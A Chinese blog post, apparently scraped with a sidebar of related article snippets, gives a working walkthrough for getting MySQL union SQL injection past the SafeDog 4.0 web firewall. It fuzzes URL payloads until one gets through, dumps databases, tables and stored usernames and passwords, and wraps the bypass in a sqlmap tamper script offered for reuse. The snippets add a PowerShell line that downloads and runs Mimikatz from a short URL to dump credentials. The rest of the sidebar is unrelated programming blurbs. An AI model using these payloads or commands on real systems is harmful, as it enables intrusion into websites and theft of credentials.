加油努力拉屎放屁
加油努力拉屎放屁

mysql联合注入绕过安全狗4.0

环境

win2003
apache
mysql
php

操作

http://192.168.1.131/Less-1/index.php?id=1 数值型注入

首先判断是否存在注入点
这里使用的是科学记数法 简单粗暴
http://192.168.1.131/Less-1/index.php?id=1e0	不变
http://192.168.1.131/Less-1/index.php?id=1e9   报错


然后判断字段数 order by
http://192.168.1.131/Less-1/index.php?id=1 order by 1		 拦截
http://192.168.1.131/Less-1/index.php?id=1 order /*!by*/ 1   不拦截
结果:字段数为3

继续联合查询注入构造语句
http://192.168.1.131/Less-1/index.php?id=1e9 union select 1,2,3  拦截

小技巧:这里的科学计数法可以和union连写

http://192.168.1.131/Less-1/index.php?id=1e9union select 1,2,3   拦截

判断可以fuzz进行绕过的地方
http://192.168.1.131/Less-1/index.php?id=1e9union select 1,2,3    拦截
http://192.168.1.131/Less-1/index.php?id=1e9uxnion select 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9unionx select 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9union xselect 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9union sexlect 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9union selectx 1,2,3   拦截

不拦截的有
http://192.168.1.131/Less-1/index.php?id=1e9uxnion select 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9unionx select 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9union xselect 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9union sexlect 1,2,3    不拦截

再判断我们不可以把select union关键词之间添加说明我们只能fuzz
http://192.168.1.131/Less-1/index.php?id=1e9union[fuzz]select 1,2,3
这个fuzz的地方了

试下我们常规的绕过吧 /**/ /*!*/ %0d%0a %23%0a
http://192.168.1.131/Less-1/index.php?id=1e9union/**/select 1,2,3             拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!%0d%0a*/select 1,2,3      拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!*/%0d%0a/**/select 1,2,3  拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!*/%0d%0aselect/**/1,2,3   拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!*/%0d%0a/*!50000select*//**/1,2,3   拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!%23%0a*//*!50000select*//**/1,2,3   拦截
继续复杂点
http://192.168.1.131/Less-1/index.php?id=1e9union/*!%23%0a/*!50000select*/1,2,3  拦截
加点符号干扰
http://192.168.1.131/Less-1/index.php?id=1e9union/*!%23!@@@@!!!%0a/*!50000select*/1,2,3  拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!-- -%23!@x\\\\\x@@@xx!!xx!%0a/*!50000select*/1,2,3 突破了

然后我们开始简化 把没用的字符去掉 
最简化:http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect 1,2,3
提取关键词 -- -x%0a

继续注入
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect 1,database(),3       拦截
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect 1,database/*!*/(),3  拦截
Fuzz:
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect1,database/*!*/(),3   拦截
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselectx1,database/*!*/(),3  不拦截

http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect[fuzz]1,database/*!*/(),3  

http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,database/*!*/(),3  不拦截

爆库名
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(SCHEMA_NAME),3 from information_schema.SCHEMATA  不拦截

爆表名
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(table_NAME),3 from information_schema.tables where table_schema='security' 不拦截

爆字段名
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(column_NAME),3 from information_schema.columns where TABLE_NAME = 'users' and TABLE_SCHEMA = 'Security'拦截


思考下 拦截单引号吗 那为什么爆表名的时候为什么不会拦截 关键词吗 比如TABLE_NAME and 之类的

http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(column_NAME),3 from information_schema.columns where TABLE_NAME = 'users' anxd TABLE_SCHEMA = 'Security' 报错

http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(column_NAME),3 from information_schema.columns where TABLE_NAME = 'users' && TABLE_SCHEMA = 'Security'  拦截

单引号可能拦截 我们16进制编码看下
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(column_NAME),3 from information_schema.columns where TABLE_NAME =0x7573657273 && TABLE_SCHEMA =0x5365637572697479   不拦截

最后查询内容
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,concat(0x7e,username,0x7e,password,0x7e),3 from users   不拦截

编写tamper

思路:直接利用re替换\s空格为关键词

#!/usr/bin/env python
# author:cbd666
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with plus ('+')

    Notes:
        * Is this any useful? The plus get's url-encoded by sqlmap engine invalidating the query afterwards
        * This tamper script works against all databases

    >>> tamper('SELECT id FROM users')
    'SELECT+id+FROM+users'
    """

    retVal = payload

    if payload:
        retVal = re.sub(r'\s',r"-- -x%0a",payload)

    return retVal

希望大家能够学习到!! 可以的话也分享下这篇文章!!!

你可能感兴趣的:(渗透技巧)

  • 渗透技巧之403绕过【总结】 gaynell 总结系统安全安全web安全其他
    文章目录渗透技巧之403绕过【总结】0x01前言0x02背景1.什么是网页403?2.什么是403绕过?3.造成403的成因0x03绕过方式1.绕过IP限制2.url覆盖绕过3.扩展名绕过(路径fuzz)4.更换协议版本5.HTTP请求方法fuzz6.修改Referer7.修改user-agent8.常用自动化工具0x04实战分析渗透技巧之403绕过【总结】0x01前言免责声明:请勿利用文章内的相
  • 渗透技巧之403绕过_指纹识别 NL0ck_S 渗透测试网络安全chromefirefoxsafari
    403绕过清单FFUF路径模糊测试ffuf-w403_url_payloads.txt-uhttp://example.com/auth_pathFUZZ-fc403,401,400HTTP标头模糊测试ffuf-w403_bypass_header_names.txt:HEADER-w403_bypass_header_values.txt:VALUE-uhttp://example.com/au
  • 【渗透技巧】资产探测及信息收集 hacker鬼七 网络安全web安全网络
    一、前言在众测中,基本上SRC的漏洞收集范围有如下几种形式:形式一:暂时仅限以下系统:www.xxx.com,其他域名不在此次测试范围内形式二:只奖励与*.xxx.com相关的漏洞形式三:无限制形式一,基本被限定了范围形式二,注重于子域名的收集形式三,子域名及相关域名的收集另外,随着企业内部业务的不断壮大,各种业务平台和管理系统越来越多,很多单位往往存在着“隐形资产”,这些“隐形资产”通常被管理员
  • 从 Admin 权限切换到 System 权限 老白_ 系统系统权限
    渗透技巧——从Admin权限切换到System权限0x00前言在渗透测试中,某些情况下需要用到system权限,例如操作注册表HKEY_LOCAL_MACHINESAMSAM恰巧最近看到了一篇文章介绍了几种获得system权限的方法,于是决定结合自己的经验对这方面的技巧做系统整理当然,前提是已经获得系统的管理员权限学习链接:https://blog.xpnsec.com/becoming-syst
  • 渗透测试面试、渗透技巧 艾欧尼亚归我了 渗透
    一、思路流程1、信息收集a、服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等)b、网站指纹识别(包括,cms,cdn,证书等),dns记录c、whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等)e、子域名收集,旁站,C段等f、googlehacking针对化搜索,pdf文件,中间件版本,弱口令扫描等g、扫描网站目录结构,爆后台,网站banner,测试文件,备份等敏感
  • 渗透测试面试问题2021版,内含大量渗透技巧 渗透测试老鸟-九青 网络安全面试渗透测试网络安全pythonphpweb安全
    目录思路流程信息收集漏洞挖掘漏洞利用&权限提升清除测试数据&输出报告复测问题1.拿到一个待检测的站,你觉得应该先做什么?2.判断出网站的CMS对渗透有什么意义?3.一个成熟并且相对安全的CMS,渗透时扫目录的意义?4.常见的网站服务器容器。5.mysql注入点,用工具对目标站直接写入一句话,需要哪些条件?6.目前已知哪些版本的容器有解析漏洞,具体举例。7.如何手工快速判断目标站是windows还是
  • 2021Web安全面试题大全(附答案详解)看完稳了 大明湖畔的九青 面试分享面试java网络安全web安全渗透测试
    人人都有一个进大厂的梦想,而进大厂的门槛也可想而知,所以这里整理了一份安全大厂的面试大全,看完文章如果对你有帮助的话希望能够点赞+收藏+关注!感谢!本篇文章对于学习Web安全的朋友来说应该是目前最全面的面试题合集了,后续也会陆续更新其他大厂的面试题目和知识点。另外我还整理了许多关于Web安全的学习资料+工具包等等,需要的点击Web安全学习一、渗透测试面试题,包含大量渗透技巧1.拿到一个待检测的站,
  • rsync的几则tips(渗透技巧) Coisini、 实战篇
    关于rsyncrsync(remotesynchronize)——Linux下实现远程同步功能的软件,能同步更新两处计算机的文件及目录。在同步文件时,可以保持源文件的权限、时间、软硬链接等附加信息。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员;而开发人员安全意识薄弱、安全技能欠缺往往是导致rsync出现相关漏洞的根源。rsync默认配置文件为/etc/rsyncd.conf,
  • 渗透技巧——Token窃取与利用 weixin_30312557
    作者:print("")分类:信息安全发布时间:2018-06-0217:21编辑0x00前言在之前的文章《渗透技巧——程序的降权启动》介绍了使用SelectMyParent降权的方法,本质上是通过token窃取实现的。这一次将要对token窃取和利用做进一步介绍,测试常用工具,分享利用技巧。0x01简介本文将要介绍以下内容;Token简介Metasploit中的incognitoWindows平
  • 内网渗透----Token 窃取与利用 浅笑⁹⁹⁶ #内网技巧
    0x00前言在之前的文章《渗透技巧——程序的降权启动》介绍了使用SelectMyParent降权的方法,本质上是通过token窃取实现的。这一次将要对token窃取和利用做进一步介绍,测试常用工具,分享利用技巧。0x01简介本文将要介绍以下内容;·Token简介·Metasploit中的incognito·Windows平台下的incognito·Invoke-TokenManipulation.
  • 红蓝对抗之域名搜集方法总结 腾讯安全应急响应中心
    作者:腾讯蓝军实习生jax、yhy、A1oe前言在历次HW、红蓝对抗、渗透测试项目中,外网的信息收集是至关重要的一个环节,外网打点信息收集全面了,可能会有四两拨千斤效果,直接突破外网边界进入内网。最近我们三人加入腾讯蓝军学习渗透技巧,导师让我们对域名资产收集方式做一次全面梳理研究。子域名是域名信息收集的一个重要部分,在防御措施严密情况下我们无法直接拿下主域名,那么就可以采用迂回战术拿下子域名,然后
  • 【内网渗透】域渗透技巧 => 第三方工具API qq_27446553 Windows渗透
    前言域管理进程转移,使得渗透测试人员能够模拟在互联网上的域名管理员账户进行操作。尽管如此,在渗透测试开始之前需要确认系统中进程是否运行。在这篇博文中,我讲介绍5个技巧来帮助大家去做这些事情。本地检测查询活跃的域控制器扫描远程系统上运行的任务扫描远程系统上NetBIOS信息PSExec扫描远程系统上的身份验证令牌获取域名管理员权限在大多数情况下,本篇文章关注的焦点在于识别运行于域名管理进程的系统。以
  • BT5中MSF很强大的一个工具 小-龟
    Byadmin¶Postedin入侵渗透技巧¶Leaveareply综合扫描服务器的软件MSF(在线攻击)msfconsole进入db_nmap-TAggressive-sV-n-O-vIP(调用nmap扫描指定ip)db_hosts(nmap的结果自动保存在hosts中)db_autopwn-p-t-e-Iip(指定IP攻击-指定IP只局限与hosts里面指定的)db_autopwn-p-t-e
  • LINUX渗透与提权总结 weixin_34255793
    本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。Linux系统下的一些常见路径:001/etc/passwd002003/etc/shadow004005/etc/fstab006007/etc/host.conf008009/etc/motd010011/etc/ld.so.conf012013/var/www/htdo
  • 各种提权、渗透经验技巧总结大全(下) netsec_steven
    liunx相关提权渗透技巧总结,一、ldap渗透技巧:1.cat/etc/nsswitch看看密码登录策略我们可以看到使用了fileldap模式2.less/etc/ldap.confbaseou=People,dc=unix-center,dc=net找到ou,dc,dc设置3.查找管理员信息匿名方式ldapsearch-x-D“cn=administrator,cn=People,dc=uni
  • Linux渗透技巧+实战 god_7z1 LinuxHacking
    一.ldap渗透技巧1.cat/etc/nsswitch看看密码登录策略我们可以看到使用了fileldap模式2.less/etc/ldap.confbaseou=People,dc=unix-center,dc=net找到ou,dc,dc设置3.查找管理员信息匿名方式ldapsearch-x-D“cn=administrator,cn=People,dc=unix-center,dc=net”-
  • 渗透技巧——Windows日志的删除与绕过 weixin_34160277
    本文讲的是渗透技巧——Windows日志的删除与绕过,0x00前言在渗透测试过程中,Windows日志往往会记录系统上的敏感操作,如添加用户,远程登录执行等。对于一次完整的渗透测试,通常会选择对Windows日志进行清除和绕过,而对于防御者来说,了解常用的绕过方法也有助于更好的保护自己的系统。所以本文将要介绍常见的Windows日志清除与绕过方法,分享经验,帮助大家。0x01简介本文将要介绍以下内
  • 渗透技巧总结 bit小兵
    旁站路径问题1、读网站配置。2、用以下VBSOnErrorResumeNextIf(LCase(Right(WScript.Fullname,11))="wscript.exe")ThenMsgboxSpace(12)&"IISVirtualWebViewer"&Space(12)&Chr(13)&Space(9)&"Usage:CscriptvWeb.vbs",4096,"Lilo"WScrip
  • 渗透技巧:Windows平台运行Masscan和Nmap weixin_34185364
    本文讲的是渗透技巧:Windows平台运行Masscan和Nmap,0x00前言在内网渗透中,信息搜集尤为重要。面对内网的复杂环境,虽说网络扫描容易暴露自己,但通过扫描可以发现内网的存活主机、开放端口,运行服务、操作系统等信息,为进一步渗透奠定基础。扫描工具的选取,不仅要考虑功能,更要考虑工具的适用性。现实中的跳板通常并不是一台Linux服务器,没有合适的环境安装Nmap、Zmap和Masscan
  • VMware Workstation 中安装metasploitable 2 xyyz.. 虚拟机渗透metasploitable
    脆弱系统(vulnerableserver)——一台存在很多漏洞的虚拟主机。也叫做靶机。用于练习渗透技巧,了解主机漏洞。这里安装的靶机是metasploitable-linux-2.0.0,安装过程如下:1、https://sourceforge.net/projects/metasploitable/,官网下载安装包:metasploitable-linux-2.0.0.zip2、解压metas
  • 内网渗透技巧 mirror97black 内网渗透
    通过powershell运行mimikatzpowershell"IEX(New-ObjectNet.WebClient).DownloadString('http://is.gd/oeoFuI');Invoke-Mimikatz-DumpCreds"获取hash之后,解出明文密码将目标机器共享盘映射到本地的h盘netuseh:\\ip\c$"密码"/user:"用户名"注意,映射盘对方也可以看到
  • 【渗透技巧】资产探测及信息收集 Bypass-- 渗透测试
    一、前言在众测中,基本上SRC的漏洞收集范围有如下几种形式:形式一:暂时仅限以下系统:www.xxx.com,其他域名不在此次测试范围内形式二:只奖励与*.xxx.com相关的漏洞形式三:无限制形式一,基本被限定了范围形式二,注重于子域名的收集形式三,子域名及相关域名的收集另外,随着企业内部业务的不断壮大,各种业务平台和管理系统越来越多,很多单位往往存在着“隐形资产”,这些“隐形资产”通常被管理员
  • web狗日记之Vulnhub-five86-2 传说中的彩虹海 你di韩商言运维linuxshellpython安全
    主要考察:1、wpcms渗透技巧2、Wpcms插件漏洞的使用3、流量捕获以及分析4、Linux提权Vulnhub官网速度感人,朋友给了这个站点,下载比较快点:http://five86.com/five86-2.html导入到虚拟机里,ip貌似为动态分配,网卡我习惯设置为桥接模式,于是nmap扫出d段,这个不用废话了,也没截图。找到ip登录主站的时候,去说明前看了看,大概了解,不是那种右键源代码就
  • 总结16种网站渗透技巧经验分享 weixin_30633949
    1.利用网站过滤不严直接绕过后台验证,在网站后面加上admin/session.asp或admin/left.asp2.有的网站进后台会出现一个脚本提示框,输入:administrator即可突破!因为admin代表以管理员身份进入的意思。3.有的网站开了3389,入侵之前先去连接3389,尝试弱口令或是爆破,再者就是按5次shift键,看看有没前人装过后门,然后再社工密码。4.有时候进后台会弹出
  • 渗透技巧——获得Powershell命令的历史记录 systemino
    0x00前言我在最近的学习过程中,发现Powershell命令的历史记录有时会包含系统敏感信息,例如远程服务器的连接口令,于是我对Powershell的历史记录功能做了进一步研究,总结一些渗透测试中常用导出历史记录的方法,结合利用思路,给出防御建议。0x01简介本文将要介绍以下内容:·两种Powershell命令的历史记录·导出Powershell命令历史记录的方法·防御建议0x02两种Power
  • 各种渗透,提权的经验和技巧总结(中) eudemon_cn 网络杂谈入侵防护
    liunx相关提权渗透技巧总结,一、ldap渗透技巧:1.cat/etc/nsswitch看看密码登录策略我们可以看到使用了fileldap模式2.less/etc/ldap.confbaseou=People,dc=unix-center,dc=net找到ou,dc,dc设置3.查找管理员信息匿名方式ldapsearch-x-D"cn=administrator,cn=People,dc=uni
  • 【PHP渗透技巧拓展】————2、利用 Gopher 协议拓展攻击面 FLy_鹏程万里 【渗透测试拓展】———PHP相关技巧
    1概述Gopher协议是HTTP协议出现之前,在Internet上常见且常用的一个协议。当然现在Gopher协议已经慢慢淡出历史。Gopher协议可以做很多事情,特别是在SSRF中可以发挥很多重要的作用。利用此协议可以攻击内网的FTP、Telnet、Redis、Memcache,也可以进行GET、POST请求。这无疑极大拓宽了SSRF的攻击面。2攻击面测试2.1环境IP:172.19.23.218
  • 2017年9月3日——周总结 FKTX
    一周回顾:上周只能用一个词语来形容,就是杂乱。思想杂乱,内心浮躁。一口饭吃不成胖子,我却妄想一步登天。我学了什么?WAF?IPS?还是防火墙?还是绕WAF等各种渗透方法?是的,我好像都学了,但是,又好像都没学。为什么这么说?因为我每个都是没有学精,没有学踏实。学WAF又去了解了IPS,学了IPS又去了解了防火墙,了解防火墙的同时又去了解了渗透技巧。杂乱无序,没有规划,学习效果自然很差。原因出自哪里
  • 渗透技巧--通过cmd上传文件的N种方法 Bugl0v3r
    渗透技巧--通过cmd上传文件的N种方法1.debugdebug是一个程序调试工具,功能包括:(win7以上版本好像没有)直接输入,更改,跟踪,运行汇编语言源程序观察操作系统的内容查看ROMBIOS的内容观察更改RAM内部的设置值以扇区或文件的方式读写软盘数据特别的是它还有一个功能可以将十六进制代码转换为可执行文件:hex思路:把需要上传的exe转换成十六进制hex的形式通过echo命令将hex代
  • 我的渗透装备 yo_哥
    @[渗透技巧,yoyoyang]终级渗透BOSSPentestBox(windows)kalilinuxChromeF12,打开开发者工具,功能==Firebug+本地存储观察等SwitchSharp插件,代理必备postman插件,接口调试工具(RESTClient)FirefoxFirebug,调试JS,HTTP请求响应观察,Cookie,DOM树观察等ProxySwitcher,代理必备ha
  • PHP如何实现二维数组排序? IT独行者 二维数组PHP排序 
    二维数组在PHP开发中经常遇到,但是他的排序就不如一维数组那样用内置函数来的方便了,(一维数组排序可以参考本站另一篇文章【PHP中数组排序函数详解汇总】)。二维数组的排序需要我们自己写函数处理了,这里UncleToo给大家分享一个PHP二维数组排序的函数: 代码: functionarray_sort($arr,$keys,$type='asc'){ $keysvalue= $new_arr
  • 【Hadoop十七】HDFS HA配置 bit1129 hadoop
    基于Zookeeper的HDFS HA配置主要涉及两个文件,core-site和hdfs-site.xml。   测试环境有三台 hadoop.master hadoop.slave1 hadoop.slave2   hadoop.master包含的组件NameNode, JournalNode, Zookeeper,DFSZKFailoverController
  • 由wsdl生成的java vo类不适合做普通java vo darrenzhu VOwsdlwebservicerpc
    开发java webservice项目时,如果我们通过SOAP协议来输入输出,我们会利用工具从wsdl文件生成webservice的client端类,但是这里面生成的java data model类却不适合做为项目中的普通java vo类来使用,当然有一中情况例外,如果这个自动生成的类里面的properties都是基本数据类型,就没问题,但是如果有集合类,就不行。原因如下: 1)使用了集合如Li
  • JAVA海量数据处理之二(BitMap) 周凡杨 java算法bitmapbitset数据
           路漫漫其修远兮,吾将上下而求索。想要更快,就要深入挖掘 JAVA 基础的数据结构,从来分析出所编写的 JAVA 代码为什么把内存耗尽,思考有什么办法可以节省内存呢? 啊哈!算法。这里采用了 BitMap 思想。   首先来看一个实验: 指定 VM 参数大小: -Xms256m -Xmx540m
  • java类型与数据库类型 g21121 java
    很多时候我们用hibernate的时候往往并不是十分关心数据库类型和java类型的对应关心,因为大多数hbm文件是自动生成的,但有些时候诸如:数据库设计、没有生成工具、使用原始JDBC、使用mybatis(ibatIS)等等情况,就会手动的去对应数据库与java的数据类型关心,当然比较简单的数据类型即使配置错了也会很快发现问题,但有些数据类型却并不是十分常见,这就给程序员带来了很多麻烦。 &nb
  • Linux命令 510888780 linux命令
    系统信息 arch 显示机器的处理器架构(1) uname -m 显示机器的处理器架构(2) uname -r 显示正在使用的内核版本 dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI) hdparm -i /dev/hda 罗列一个磁盘的架构特性 hdparm -tT /dev/sda 在磁盘上执行测试性读取操作 cat /proc/cpuinfo 显示C
  • java常用JVM参数 墙头上一根草 javajvm参数
    -Xms:初始堆大小,默认为物理内存的1/64(<1GB);默认(MinHeapFreeRatio参数可以调整)空余堆内存小于40%时,JVM就会增大堆直到-Xmx的最大限制 -Xmx:最大堆大小,默认(MaxHeapFreeRatio参数可以调整)空余堆内存大于70%时,JVM会减少堆直到 -Xms的最小限制 -Xmn:新生代的内存空间大小,注意:此处的大小是(eden+ 2
  • 我的spring学习笔记9-Spring使用工厂方法实例化Bean的注意点 aijuans Spring 3
    方法一: <bean id="musicBox" class="onlyfun.caterpillar.factory.MusicBoxFactory" factory-method="createMusicBoxStatic"></bean> 方法二:
  • mysql查询性能优化之二 annan211 UNIONmysql查询优化索引优化
    1 union的限制 有时mysql无法将限制条件从外层下推到内层,这使得原本能够限制部分返回结果的条件无法应用到内层 查询的优化上。 如果希望union的各个子句能够根据limit只取部分结果集,或者希望能够先排好序在 合并结果集的话,就需要在union的各个子句中分别使用这些子句。 例如 想将两个子查询结果联合起来,然后再取前20条记录,那么mys
  • 数据的备份与恢复 百合不是茶 oraclesql数据恢复数据备份
     数据的备份与恢复的方式有: 表,方案 ,数据库;     数据的备份: 导出到的常见命令; 参数 说明 USERID 确定执行导出实用程序的用户名和口令 BUFFER 确定导出数据时所使用的缓冲区大小,其大小用字节表示 FILE 指定导出的二进制文
  • 线程组 bijian1013 java多线程threadjava多线程线程组
    有些程序包含了相当数量的线程。这时,如果按照线程的功能将他们分成不同的类别将很有用。        线程组可以用来同时对一组线程进行操作。        创建线程组:ThreadGroup g = new ThreadGroup(groupName);  &nbs
  • top命令找到占用CPU最高的java线程 bijian1013 javalinuxtop
    上次分析系统中占用CPU高的问题,得到一些使用Java自身调试工具的经验,与大家分享。 (1)使用top命令找出占用cpu最高的JAVA进程PID:28174 (2)如下命令找出占用cpu最高的线程 top -Hp 28174 -d 1 -n 1 32694 root 20 0 3249m 2.0g 11m S 2 6.4 3:31.12 java
  • 【持久化框架MyBatis3四】MyBatis3一对一关联查询 bit1129 Mybatis3
      当两个实体具有1对1的对应关系时,可以使用One-To-One的进行映射关联查询   One-To-One示例数据 以学生表Student和地址信息表为例,每个学生都有都有1个唯一的地址(现实中,这种对应关系是不合适的,因为人和地址是多对一的关系),这里只是演示目的   学生表   CREATE TABLE STUDENTS (
  • C/C++图片或文件的读写 bitcarter 写图片
    先看代码: /*strTmpResult是文件或图片字符串 * filePath文件需要写入的地址或路径 */ int writeFile(std::string &strTmpResult,std::string &filePath) { int i,len = strTmpResult.length(); unsigned cha
  • nginx自定义指定加载配置 ronin47
    进入 /usr/local/nginx/conf/include 目录,创建 nginx.node.conf 文件,在里面输入如下代码: upstream nodejs { server 127.0.0.1:3000; #server 127.0.0.1:3001; keepalive 64; } server { liste
  • java-71-数值的整数次方.实现函数double Power(double base, int exponent),求base的exponent次方 bylijinnan double
    public class Power { /** *Q71-数值的整数次方 *实现函数double Power(double base, int exponent),求base的exponent次方。不需要考虑溢出。 */ private static boolean InvalidInput=false; public static void main(
  • Android四大组件的理解 Cb123456 android四大组件的理解
     分享一下,今天在Android开发文档-开发者指南中看到的:                            App components are the essential building blocks of an Android
  • [宇宙与计算]涡旋场计算与拓扑分析 comsci 计算
         怎么阐述我这个理论呢? 。。。。。。。。。       首先: 宇宙是一个非线性的拓扑结构与涡旋轨道时空的统一体。。。。       我们要在宇宙中寻找到一个适合人类居住的行星,时间非常重要,早一个刻度和晚一个刻度,这颗行星的
  • 同一个Tomcat不同Web应用之间共享会话Session cwqcwqmax9 session
    实现两个WEB之间通过session 共享数据 查看tomcat 关于 HTTP Connector 中有个emptySessionPath 其解释如下: If set to true, all paths for session cookies will be set to /. This can be useful for portlet specification impleme
  • springmvc Spring3 MVC,ajax,乱码 dashuaifu springjquerymvcAjax
      springmvc Spring3 MVC @ResponseBody返回,jquery ajax调用中文乱码问题解决   Spring3.0 MVC @ResponseBody 的作用是把返回值直接写到HTTP response body里。具体实现AnnotationMethodHandlerAdapter类handleResponseBody方法,具体实
  • 搭建WAMP环境 dcj3sjt126com wamp
    这里先解释一下WAMP是什么意思。W:windows,A:Apache,M:MYSQL,P:PHP。也就是说本文说明的是在windows系统下搭建以apache做服务器、MYSQL为数据库的PHP开发环境。      工欲善其事,必须先利其器。因为笔者的系统是WinXP,所以下文指的系统均为此系统。笔者所使用的Apache版本为apache_2.2.11-
  • yii2 使用raw http request dcj3sjt126com http
    Parses a raw HTTP request using yii\helpers\Json::decode()   To enable parsing for JSON requests you can configure yii\web\Request::$parsers using this class: 'request' =&g
  • Quartz-1.8.6 理论部分 eksliang quartz
    转载请出自出处:http://eksliang.iteye.com/blog/2207691 一.概述 基于Quartz-1.8.6进行学习,因为Quartz2.0以后的API发生的非常大的变化,统一采用了build模式进行构建; 什么是quartz?   答:简单的说他是一个开源的java作业调度框架,为在 Java 应用程序中进行作业调度提供了简单却强大的机制。并且还能和Sp
  • 什么是POJO? gupeng_ie javaPOJO框架Hibernate
    POJO--Plain Old Java Objects(简单的java对象)   POJO是一个简单的、正规Java对象,它不包含业务逻辑处理或持久化逻辑等,也不是JavaBean、EntityBean等,不具有任何特殊角色和不继承或不实现任何其它Java框架的类或接口。   POJO对象有时也被称为Data对象,大量应用于表现现实中的对象。如果项目中使用了Hiber
  • jQuery网站顶部定时折叠广告 ini JavaScripthtmljqueryWebcss
    效果体验:http://hovertree.com/texiao/jquery/4.htmHTML文件代码: <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>网页顶部定时收起广告jQuery特效 - HoverTree<
  • Spring boot内嵌的tomcat启动失败 kane_xie spring boot
    根据这篇guide创建了一个简单的spring boot应用,能运行且成功的访问。但移植到现有项目(基于hbase)中的时候,却报出以下错误:     SEVERE: A child container failed during start java.util.concurrent.ExecutionException: org.apache.catalina.Lif
  • leetcode: sort list michelle_0916 Algorithmlinked listsort
    Sort a linked list in O(n log n) time using constant space complexity. ====analysis======= mergeSort for singly-linked list  ====code=======   /** * Definition for sin
  • nginx的安装与配置,中途遇到问题的解决 qifeifei nginx
    我使用的是ubuntu13.04系统,在安装nginx的时候遇到如下几个问题,然后找思路解决的,nginx 的下载与安装   wget http://nginx.org/download/nginx-1.0.11.tar.gz tar zxvf nginx-1.0.11.tar.gz ./configure make make install   安装的时候出现
  • 用枚举来处理java自定义异常 tcrct javaenumexception
    在系统开发过程中,总少不免要自己处理一些异常信息,然后将异常信息变成友好的提示返回到客户端的这样一个过程,之前都是new一个自定义的异常,当然这个所谓的自定义异常也是继承RuntimeException的,但这样往往会造成异常信息说明不一致的情况,所以就想到了用枚举来解决的办法。 1,先创建一个接口,里面有两个方法,一个是getCode, 一个是getMessage public
  • erlang supervisor分析 wudixiaotie erlang
    当我们给supervisor指定需要创建的子进程的时候,会指定M,F,A,如果是simple_one_for_one的策略的话,启动子进程的方式是supervisor:start_child(SupName, OtherArgs),这种方式可以根据调用者的需求传不同的参数给需要启动的子进程的方法。和最初的参数合并成一个数组,A ++ OtherArgs。那么这个时候就有个问题了,既然参数不一致,那
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他